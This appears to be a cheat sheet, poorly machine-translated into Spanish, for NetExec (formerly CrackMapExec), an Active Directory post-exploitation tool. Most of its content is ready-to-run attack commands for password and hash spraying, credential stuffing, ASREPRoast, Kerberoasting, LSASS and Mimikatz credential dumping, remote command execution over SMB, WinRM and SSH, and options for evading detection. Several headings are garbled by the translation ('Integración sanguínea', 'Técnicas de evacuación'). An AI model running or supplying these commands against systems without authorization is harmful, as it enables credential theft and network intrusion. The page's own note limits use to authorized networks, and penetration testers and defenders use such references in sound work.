Saltar a contenido

NetExec

"Clase de la hoja"

########################################################################################################################################################################################################################################################## Copiar todos los comandos
########################################################################################################################################################################################################################################################## Generar PDF seleccionado/button

■/div titulada

NetExec (antes CrackMapExec) es una herramienta post-explotación que ayuda a automatizar la evaluación de la seguridad de las grandes redes Active Directory a través del abuso de protocolo de red y ataques credenciales.

Instalación

Command Description
pip3 install netexec Install NetExec via pip
pipx install netexec Install with pipx (recommended)
git clone https://github.com/Pennyw0rth/NetExec.git Clone from GitHub
cd NetExec && pip3 install . Install from source
netexec --version Check installed version
netexec --help Display help information

Uso básico

Command Description
netexec smb 192.168.1.0/24 Scan SMB on subnet
netexec smb 192.168.1.100 -u username -p password Authenticate with credentials
netexec smb 192.168.1.100 -u username -H ntlmhash Authenticate with NTLM hash
netexec smb 192.168.1.100 -u '' -p '' Anonymous authentication
netexec smb targets.txt -u username -p password Use target file

Apoyo al Protocolo

SMB Protocol

Command Description
netexec smb 192.168.1.100 Basic SMB enumeration
netexec smb 192.168.1.100 --shares Enumerate shares
netexec smb 192.168.1.100 --users Enumerate users
netexec smb 192.168.1.100 --groups Enumerate groups
netexec smb 192.168.1.100 --local-groups Enumerate local groups
netexec smb 192.168.1.100 --sessions Enumerate sessions
netexec smb 192.168.1.100 --disks Enumerate disks

Protocolo de WinRM

Command Description
netexec winrm 192.168.1.100 -u username -p password WinRM authentication
netexec winrm 192.168.1.100 -u username -p password -x "whoami" Execute command
netexec winrm 192.168.1.100 -u username -p password -X powershell.ps1 Execute PowerShell script

Protocolo de LDAP

Command Description
netexec ldap 192.168.1.100 -u username -p password LDAP authentication
netexec ldap 192.168.1.100 -u username -p password --users Enumerate LDAP users
netexec ldap 192.168.1.100 -u username -p password --groups Enumerate LDAP groups
netexec ldap 192.168.1.100 -u username -p password --computers Enumerate computers

MSSQL Protocol

Command Description
netexec mssql 192.168.1.100 -u username -p password MSSQL authentication
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version" Execute SQL query
netexec mssql 192.168.1.100 -u username -p password --local-auth Local authentication

Protocolo SSH

Command Description
netexec ssh 192.168.1.100 -u username -p password SSH authentication
netexec ssh 192.168.1.100 -u username -k id_rsa SSH key authentication
netexec ssh 192.168.1.100 -u username -p password -x "id" Execute command

Métodos de autenticación

Contraseña Autenticación

Command Description
netexec smb 192.168.1.100 -u username -p password Single credential
netexec smb 192.168.1.100 -u users.txt -p passwords.txt Credential lists
netexec smb 192.168.1.100 -u username -p passwords.txt Password spraying
netexec smb 192.168.1.100 -u users.txt -p password User enumeration

Hash Authentication

Command Description
netexec smb 192.168.1.100 -u username -H ntlmhash NTLM hash
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash LM:NTLM hash
netexec smb 192.168.1.100 -u users.txt -H hashes.txt Hash lists

Kerberos Authentication

Command Description
netexec smb 192.168.1.100 -u username -p password -k Kerberos authentication
netexec smb 192.168.1.100 -u username --use-kcache Use Kerberos cache
netexec smb 192.168.1.100 -u username -p password --kerberos Force Kerberos

Enumeración

Compartir Enumeración

Command Description
netexec smb 192.168.1.100 --shares List shares
netexec smb 192.168.1.100 --shares -u username -p password Authenticated share listing
netexec smb 192.168.1.100 --spider SHARE Spider share contents
netexec smb 192.168.1.100 --spider SHARE --pattern "*.txt" Search for files

Enumeración del usuario

Command Description
netexec smb 192.168.1.100 --users Enumerate users
netexec smb 192.168.1.100 --rid-brute RID bruteforce
netexec smb 192.168.1.100 --users --rid-brute 1000-2000 RID range

Group Enumeration

Command Description
netexec smb 192.168.1.100 --groups Enumerate groups
netexec smb 192.168.1.100 --local-groups Local groups
netexec smb 192.168.1.100 --groups "Domain Admins" Specific group

Computación

Command Description
netexec ldap 192.168.1.100 --computers Enumerate computers
netexec smb 192.168.1.100 --computers SMB computer enumeration

Ejecución del Mando

SMB Command Execution

Command Description
netexec smb 192.168.1.100 -u username -p password -x "whoami" Execute command
netexec smb 192.168.1.100 -u username -p password -X script.ps1 Execute PowerShell script
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec Use WMI execution
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec Use SMB execution

Ejecución del comando WinRM

Command Description
netexec winrm 192.168.1.100 -u username -p password -x "Get-Process" PowerShell command
netexec winrm 192.168.1.100 -u username -p password -X script.ps1 Execute script

Módulos

Módulos incorporados

Command Description
netexec smb 192.168.1.100 -M spider_plus Enhanced spidering
netexec smb 192.168.1.100 -M enum_avproducts Enumerate AV products
netexec smb 192.168.1.100 -M gpp_password Group Policy Preferences
netexec smb 192.168.1.100 -M lsassy LSASS dumping
netexec smb 192.168.1.100 -M mimikatz Mimikatz execution

Opciones de módulo

Command Description
netexec smb 192.168.1.100 -M spider_plus -o READ_ONLY=false Module options
netexec smb 192.168.1.100 -M lsassy -o BLOODHOUND=true Bloodhound output

Operaciones de base de datos

Command Description
netexec smb 192.168.1.100 --users --export users.csv Export to CSV
netexec db Database management
netexec db --workspace default Set workspace
netexec db --clear-database Clear database

Características avanzadas

Crédential Stuffing

Command Description
netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success Continue on success
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3 Fail limit

Política de contraseña

Command Description
netexec smb 192.168.1.100 --pass-pol Get password policy
netexec ldap 192.168.1.100 --pass-pol LDAP password policy

Integración sanguínea

Command Description
netexec ldap 192.168.1.100 -u username -p password --bloodhound Collect Bloodhound data
netexec ldap 192.168.1.100 -u username -p password --bloodhound -c All All collections

ASREPRoast

Command Description
netexec ldap 192.168.1.100 -u users.txt --asreproast asrep.txt ASREPRoast attack
netexec ldap 192.168.1.100 -u username -p password --asreproast asrep.txt Authenticated ASREPRoast

Kerberoasting

Command Description
netexec ldap 192.168.1.100 -u username -p password --kerberoasting kerb.txt Kerberoasting attack

Output and Logging

Command Description
netexec smb 192.168.1.100 --verbose Verbose output
netexec smb 192.168.1.100 --debug Debug output
netexec smb 192.168.1.100 -o output.txt Save output to file
netexec smb 192.168.1.100 --log logs/ Log directory

Configuración

Config File (~/.nxc/nxc.conf)

[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0

Opciones específicas del Protocolo

Command Description
netexec smb 192.168.1.100 --port 445 Custom port
netexec smb 192.168.1.100 --timeout 5 Connection timeout
netexec smb 192.168.1.100 --threads 100 Thread count

Técnicas de evacuación

Command Description
netexec smb 192.168.1.100 --jitter 1-5 Random delay
netexec smb 192.168.1.100 --delay 2 Fixed delay
netexec smb 192.168.1.100 --obfs Obfuscation

Escenarios de ataque comunes

Domain Enumeration

# Basic domain enumeration
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password policy
netexec smb dc.domain.com -u username -p password --pass-pol

Ataques credenciales

# Password spraying
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# ASREPRoast
netexec ldap dc.domain.com -u users.txt --asreproast asrep_hashes.txt

Post-Explotación

# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS dumping
netexec smb 192.168.1.100 -u username -p password -M lsassy

# Bloodhound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All

Integración con otras herramientas

Impacket Integration

Command Description
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec Use Impacket WMI
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec Use Impacket SMB

Crackmapexec Migración

Command Description
netexec --convert-cme-db Convert CME database
alias cme='netexec' Create alias for compatibility

Solución de problemas

Command Description
netexec --help General help
netexec smb --help Protocol-specific help
netexec -v Version information
netexec --debug smb 192.168.1.100 Debug mode

Buenas prácticas

  • Use autenticación antes de la enumeración cuando sea posible
  • Implementar retrasos adecuados para evitar la detección
  • Utilice espacios de trabajo para organizar diferentes compromisos
  • Resultados de las exportaciones para un mayor análisis
  • Combinar con otros instrumentos para una evaluación integral
  • Monitor para respuestas defensivas
  • Utilice los recuentos de hilo apropiados para evitar objetivos abrumadores
  • Implementar registros adecuados para la documentación
  • Validar credenciales antes de ataques a gran escala
  • Use técnicas de obfuscación cuando sea necesario

Consideraciones de seguridad

  • Únicamente uso en redes autorizadas
  • Implementar controles adecuados de acceso
  • Monitor for detection by security tools
  • Utilizar principios mínimos de privilegio
  • Document all activities for compliance
  • Coordinar con equipo azul cuando sea aplicable
  • Implementar procedimientos adecuados de limpieza
  • Sus credenciales de almacenamiento de forma segura
  • Utilice la comunicación encriptada cuando sea posible
  • Actualizaciones periódicas para mantener la eficacia